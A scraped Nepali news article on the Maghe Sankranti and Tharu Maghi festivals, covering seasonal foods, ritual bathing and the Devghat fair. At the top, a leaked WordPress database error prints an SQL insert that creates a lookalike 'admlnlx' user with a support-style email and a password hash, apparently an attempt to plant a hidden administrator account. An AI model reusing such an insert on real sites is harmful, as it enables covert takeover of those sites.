WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BdC8fZf5kAmxdwhFLYbCL.iN9SKUEe1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 05:04:13', '', 'admlnlx', 'admlnlx')
चितवन,माघ १-
चाकु, तरुल र तिलको लड्डुलजस्ता पोषिला खानेकुरा खाएर आज माघे संक्रान्ति पर्व मनाइँदैछ ।हरेक वर्ष माघे संक्रान्तिलाई विशेष रुपमा मनाउने चलन छ । विभिन्न जातीय समुदायले यसलार्इ भिन्न भिन्न तरिकाले मनाउँछन् ।
माघे संक्रान्तिदेखि सूर्य धनुबाट मकर राशीमा प्रवेश गरी उत्तरायण हुने हुनाले यसलाई मकर संक्रान्ति पनि भनिन्छ ।आजको दिन पवित्र नदी, तलाउ तथा त्रिवेणीमा स्नान गरी पूजाआजासँगै पोषिला खानेकुरा खाएर यो पर्व मनाउने गरिन्छ ।
मकर संक्रान्तिको अवसरमा चितवन, नवलपरासी र तनहुँको संगमस्थल देवघाट धाममा ठूलो मेला लाग्छ । देवघाटधाममा मेला भर्न देशका विभिन्न जिल्लासँगै छिमेकी देश भारतबाट समेत तिर्थालूहरु आउने गर्छन् ।
थारु समुदायले माघी पर्व मनाउँदै
आजै थारु समुदायले धुमधामका साथ माघी पर्व मनाउँदैछन् । आजदेखि पाँच दिनसम्म थारु समुदायले माघी पर्व मनाउने गर्छन् । बिहानै जलाशयमा गई स्नान तथा पूजा गरी आफूभन्दा ठूलाबढासँग आशिर्वाद लिने चलन छ ।
तिलले स्नान गर्नु, तिलको तेल घस्नु, पितृलाई तिलयुक्त जल दिनु, तिल हवन गर्नु, तिल दान गर्नु र तिल खानु गरी ६ प्रकारको तिलको प्रयोग गर्नाले जीवनमा सफल होइने थारु समुदायमा विश्वास छ ।आज तिल, चाकु, तरुलजस्ता खानेकुरा खानाले शरीरमा तापक्रम बढ्ने र जाडो हट्ने मान्यता छ ।